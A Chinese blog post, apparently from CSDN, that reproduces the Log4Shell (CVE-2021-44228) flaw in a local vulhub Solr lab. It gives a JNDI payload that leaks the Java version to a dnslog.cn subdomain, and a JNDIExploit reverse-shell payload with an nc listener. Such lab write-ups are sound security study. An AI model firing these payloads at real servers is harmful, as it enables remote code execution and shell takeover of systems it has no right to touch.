log4j-CVE-2021-44228-vulhub复现

最新推荐文章于 2024-07-16 15:11:55 发布
最新推荐文章于 2024-07-16 15:11:55 发布
阅读量630 收藏 3
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ANYOUZHEN/article/details/125115517
版权

使用kali上的vulhub去打开

我们输入在kali当前终端输入docker-compose up -d --build

启动靶场

但是启动靶场时出现了报错问题,网上搜索解决方法

解决方法:给管理权限

在kali终端输入:sudo docker-compose up -d  

下面可以看到靶场正在启动

接着输入 http://127.0.0.1:8983/solr/#/

可以看到靶场成功打开

Dnslog测试

DNSLog Platform  //dnslog平台网址

我们在kali上第二个窗口打开dnslog平台进行记录,点击get subdomain请求一个dns域名

得到dns域名:lfjceo.dnslog.cn

 在靶场上传参:/admin/cores?action=${jndi:ldap://${sys:java.version}.lfjceo.dnslog.cn}http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.lfjceo.dnslog.cn}

点一下右边那个refresh,查看dns

此时直接得到版本信息:1.8.0

进入最后一步,反弹shell

反弹shell需要使用JNDIExploit.v1.2,可以从下面百度网盘直接下载:

https://pan.baidu.com/s/1lxXt-27-i7I_dOUACphVtQ 提取码: nkc5

中转机:10.211.55.3 

中转机java版本:1.8.0_172

首先在中转机上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java启动,命令如下:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.211.55.3

 其中:10.211.55.3为中转机的ip地址

 然后在攻击机上开启监听:nc -lvvp 6666

此时构造如下命令: (payload构造不需要经过base64编码)

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://10.211.55.3:1389/Basic/ReverseShell/10.211.55.23/6666}

  • http://127.0.0.1:8983为靶机的地址

  • 10.211.55.3为中转机地址

  • 10.211.55.23为Kali攻击机ip地址,此时要反弹shell

执行,反弹shell

打开中转机

 成功,我们需要清除靶机

docker-compose down

 

ANYOUZHEN
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LOG4J2(CVE-2021-44228)vulhub复现
kriesa的博客
07-13 1471
LOG4J2(CVE-2021-44228)vulhub复现
复现log4j2-CVE-2021-44228
SharkVeryBusy的博客
05-17 431
复现log4j2漏洞
vulhubLog4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2791
vulhubLog4j2:CVE-2021-44228漏洞复现
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)
qq_46145027的博客
05-10 3598
刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。
Log4j2注入漏洞(CVE-2021-44228)漏洞复现
m0_58596609的博客
10-10 1851
Log4j2注入漏洞(CVE-2021-44228)漏洞复现
log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)
qq_41132792的博客
05-24 5376
纯粹的一个过程复现,小白向,没有复杂的讲解,按照步骤一步步来就可以成功复现了。
CVE-2021-44228 Apache Log4j2 远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-03 4218
Apache Log4j2 是 Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广。
log4j-api-2.12.4.ja和log4j-core-2.12.4.jar
04-27
提到的"避免log4j漏洞问题"可能指的是在2021年出现的严重安全漏洞——CVE-2021-44228,也被称为Log4Shell。这个漏洞允许攻击者通过注入恶意的JNDI(Java Naming and Directory Interface)链接来执行远程代码。...
Log4j-2.15.0-rc2.zip
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228) 包含log4j-slf4j-impl-2.15.0.jar、log4j-1.2-api-2.15.0.jar、log4j-core-2.15.0.jar、log4j-web-2.15.0.jar、log4j-api-2.15.0.jar
log4j-2.15.0-rc2
12-13
log4j-2.15.0-rc2中,主要修复了JNDI注入漏洞(CVE-2021-44228),这是由于日志配置中的某些特性允许恶意输入触发远程代码执行。此漏洞的影响范围广泛,因此更新至这个修复版本至关重要。开发者应该立即检查他们的...
apache-log4j-2.17.0 核心jar包
03-31
Log4j 是一个日志记录框架,Log4j 2 是对 Log4j 的升级,提供了重大改进,超越其前身 Log4j 1.x,并提供...Log4j 团队已获悉一个安全漏洞 CVE-2021-45105,该漏洞已在 Java 8 及更高版本的 Log4j 2.17.0 中得到解决。
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 6676
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
vulhub漏洞复现CVE-2021-44228 Apache Log4j 远程代码执行漏洞
RexHa的博客
03-01 2277
一、漏洞详情Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。JNDI注入漏洞JNDI (Java Naming and Directory Interface) 是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。
[WEB攻防]Apache log4j2 远程代码漏洞(CVE-2021-44228)安鸾靶场复现 +学习过程
AAAAAAAAAAAA66的博客
01-25 2024
中华人民共和国网络安全法(出版物)_360百科 其实搭建好环境,再利用其实很快能复现,但对我来说就是配置各种环境(java ldap 防火墙……)麻烦,另外在网上也没找到write up ,所以只能找一些相关的来学习,虽然走了不少弯路,但也学到不少相关的技巧与知识。 目录 漏洞原理 复现过程 检测 利用 防御方法 总结 漏洞原理 官方: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。...
利用Vulhub复现log4j漏洞
god_001的博客
04-27 4278
Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机: 首先进入log4j路径 cd vulhub/log4j/CVE-2021-44228/ 搭建环境 sudo docker-compose build sudo docker-compose up -d 网址输入:http://127.0.0.1:8983/admin/cores 在DNSlog网站生成域名:jkvl0r.dnslog.cn 输入http://127.0.0.1:8983/admin/cores?action
利用Vulhub复现log4j漏洞CVE-2021-44228
plant1234的博客
10-02 750
这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。可以利用http://www.dnslog.cn/ 申请一个dns域名进行检测。接下来要实现反弹shell,可以用命令。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 555
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
Log4j-CVE-2017-5645
10-05
Log4j-CVE-2017-5645是指Apache Log4j 2.x版本中存在的安全漏洞。攻击者可以利用该漏洞执行任意代码。为了利用该漏洞,攻击者可以使用ysoserial生成payload,并发送到受影响的Log4j服务器。具体操作可以使用以下命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值